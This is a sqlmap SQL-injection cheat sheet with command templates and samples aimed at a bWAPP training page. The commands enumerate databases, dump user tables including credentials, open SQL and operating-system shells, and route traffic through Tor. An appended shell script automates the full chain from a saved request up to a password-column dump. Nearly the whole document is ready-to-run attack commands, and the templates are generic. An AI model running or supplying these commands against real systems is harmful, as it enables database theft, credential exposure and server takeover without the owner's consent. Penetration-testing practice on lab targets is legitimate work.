[SQLMAP]
PRE-REQS:
1. An injectable parameter (the "vulnerable field"), e.g. title= in the sample URL below.
2. The authentication/session cookie, if the page requires a logged-in session (pass it with --cookie).

0x1: GET BANNER
sqlmap -u "INSERT_VULN_URL" --cookie=" " -b
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b

0x2: GET DATABASE USERS (add --current-user to get only the user the application connects as)
sqlmap -u "INSERT_VULN_URL" --cookie=" " --users
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --users

0x3: GET DATABASES
sqlmap -u "INSERT_VULN_URL" --cookie=" " --dbs
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --dbs

0x4: GET TABLES
sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME --tables
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP --tables

0x5: GET COLUMNS FROM TABLE
sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --columns
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --columns

0x6: DUMP A TABLE
sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME --dump
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users --dump

0x7: DUMP SPECIFIC COLUMNS
sqlmap -u "INSERT_VULN_URL" --cookie=" " -D DATABASE_NAME -T TABLE_NAME -C column_name1,column_name2 --dump
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -D bWAPP -T users -C login,email --dump

0x8: GET INTERACTIVE DB SHELL (run arbitrary SQL through the injection)
sqlmap -u "INSERT_VULN_URL" --cookie=" " --sql-shell
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --sql-shell

0x9: GET SYSTEM OS SHELL (needs a privileged DB user and a writable/stackable backend; fails otherwise)
sqlmap -u "INSERT_VULN_URL" --cookie=" " --os-shell
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --os-shell

0x10: USE TOR AS PROXY (--check-tor verifies the traffic really exits through Tor before testing starts)
sqlmap --tor --tor-type=SOCKS5 --check-tor -u "INSERT_VULN_URL" --cookie=" " -b
SAMPLE: sqlmap --tor --tor-type=SOCKS5 --check-tor -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" -b

0x11: EXPLOIT A SPECIFIC TECHNIQUE
sqlmap -u "INSERT_VULN_URL" --cookie=" " --technique=TECH
TECH is one or more of: B (boolean-based blind), E (error-based), U (UNION query), S (stacked queries), T (time-based blind), Q (inline queries). Default is all of them (BEUSTQ).
SAMPLE: sqlmap -u "http://ip_addr/bWAPP/sqli_1.php?title=" --cookie="security_level=0; PHPSESSID=1e80" --technique=U

0x12: USE A SAVED REQUEST FILE
sqlmap -r [request_filename]
SAMPLE: sqlmap -r request.txt
NOTE: A request file lets sqlmap test the entire request (every query/POST parameter, cookie and header) for injection, not just the URL.
--is-dba = check whether the current DB user has DBA privileges; the result is True or False
-p PARAM = name the injectable parameter explicitly when sqlmap cannot find it on its own
NOTES:
1. The vulnerable parameter is specified with the -p flag (not -D; -D selects the database name).
2. Results (session file, log and dump CSVs) are normally stored under "/home/USER/.local/share/sqlmap/output/<target_host>/..." unless --output-dir is given.
3. Use Burp Suite to intercept the traffic and learn which authentication/session mechanism is in use.
4. Copy the raw request from Burp Suite into a file and feed it to sqlmap with -r.
5. A saved request of a login form (POST body) can be tested the same way to see whether its parameters are injectable.
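The chain above (banner, privilege check, databases, tables, columns, dump) is normally driven from one saved request rather than retyped per step. The script below is an added example, not from the original cheat sheet: it writes a constructed Burp-style request file (host, cookie and header values are assumptions, carried over from the page's placeholders), marks the injection point with sqlmap's `*` marker instead of `-p`, and runs every step non-interactively with `--batch` into a fixed `--output-dir`. The database and table names come from the page's bWAPP samples; the `password` column is an assumption.

```shell
#!/bin/sh
# Added example (not part of the cheat sheet): run the enumeration chain
# from a Burp-style request file, non-interactively.
set -eu

REQ_FILE="${REQ_FILE:-./request.txt}"   # where the constructed request is written
OUT_DIR="${OUT_DIR:-./sqlmap-out}"      # fixed output dir instead of ~/.local/share/sqlmap/output

# Write a raw HTTP request as Burp's "Copy to file" produces it.
# CONSTRUCTED sample: host/cookie values are the page's placeholders, not a real capture.
# The '*' after "title=" is sqlmap's custom injection marker: sqlmap tests exactly
# that position, which is the request-file equivalent of "-p title" on a URL.
write_request() {
    cat > "$1" <<'EOF'
GET /bWAPP/sqli_1.php?title=* HTTP/1.1
Host: ip_addr
User-Agent: Mozilla/5.0
Cookie: security_level=0; PHPSESSID=1e80
Connection: close

EOF
}

# One enumeration step. Every step reuses the same request, session and output
# directory, so sqlmap reads the confirmed injection back from session.sqlite
# under OUT_DIR and does not re-detect it on later steps.
step() {
    sqlmap -r "$REQ_FILE" --batch --output-dir="$OUT_DIR" --dump-format=CSV "$@"
}

run_enum() {
    if ! command -v sqlmap >/dev/null 2>&1; then
        echo "sqlmap not found in PATH; request file written to $REQ_FILE" >&2
        return 0
    fi
    step -b --is-dba --current-user                         # banner + privilege check first
    step --dbs                                              # databases
    step -D bWAPP --tables                                  # tables (bWAPP name from the page sample)
    step -D bWAPP -T users --columns                        # columns
    step -D bWAPP -T users -C login,email,password --dump   # 'password' column is an assumption
    echo "dump CSVs are under: $OUT_DIR/ip_addr/dump/bWAPP/"
}

write_request "$REQ_FILE"
run_enum
```

Because all steps share `--output-dir`, the dump lands in `<OUT_DIR>/<host>/dump/<db>/<table>.csv` rather than the default path in note 2. If the target, cookie or injection point changes between runs, add `--flush-session` to the first step so sqlmap does not reuse a stale detection result.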
©® - 2023/2024.